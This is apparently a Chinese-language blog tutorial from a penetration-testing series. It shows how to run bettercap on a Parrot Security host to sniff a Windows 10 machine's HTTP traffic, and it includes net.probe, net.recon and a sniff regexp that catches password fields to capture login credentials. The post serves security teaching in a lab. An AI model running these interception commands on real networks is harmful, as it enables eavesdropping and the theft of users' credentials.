Day20:今天我们来聊一下如何使用bettercap工具来拦截 HTTP 流量

攻击者可以使用session hijacking来发起各种攻击,例如中间人(MITM)攻击。

在MITM攻击中,攻击者将自己置於授权客户端和网络服务器之间,以便在任一方向

传输的所有信息都通过它们。作为渗透测试员必须了解MITM攻击的工作原理,

以便保护组织的敏感信息免受他们的侵害。

登入Parrot Security主机,输入sudo su切换身份

输入cd切换目録

输入指令bettercap -h查看指令用法

https://ithelp.ithome.com.tw/upload/images/20211004/20112182rJACeBtAPB.png

输入指令bettercap -iface eth0开始执行

https://ithelp.ithome.com.tw/upload/images/20211004/201121820yeow5vdfV.png

输入help

https://ithelp.ithome.com.tw/upload/images/20211004/20112182XKFQ6tEeFd.png

输入指令net.probe on

输入指令net.recon on

输入指令set net.sniff.regexp ‘.*password=.+’

https://ithelp.ithome.com.tw/upload/images/20211004/20112182fRSxnCIbt6.png

我们可以从bettercap去拦劫Windows 10主机的网路流量

https://ithelp.ithome.com.tw/upload/images/20211004/20112182MVMiIE53cq.png

从中截取到在Windows 10登入网站输入的帐号/密码(实做有问题先放示意图)

https://ithelp.ithome.com.tw/upload/images/20211004/201121826mjHOfH3UX.png


<<:  [DAY-20] 应徵与面试 掌握胜出的诀窍

>>:  Day19 PHP的常用函数-4:文件处理函数、Json

Day11回圈(Ⅰ)

当我们需要程序1.重复执行2.判断对错就需要用到回圈,像是算面积,算完一个想再算一个可以利用回圈让使...

来做一个简单的 To-do List 吧! (上)

前言 今天来尝试做个简单版的 To-do List,让自己对於 To-do List 的实作有一个粗...

如何以 SSH 方式 Clone 在 GitHub 上的项目

以本身自家服务器上的 Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0–74-...

[Day 20] 资料产品与 DataOps 价值

资料可以是资产、也可以是负债。 当组织积累了太多无用、甚至错误的资料时,资料不但不能提供价值,反而需...

[DAY 3] _ 开发板规划补充(stm32f030)

先聊个题外话因为是第一次参加这种比赛,我从来没有这样发文过,我第一天担心很多,这30天会不会很难发文...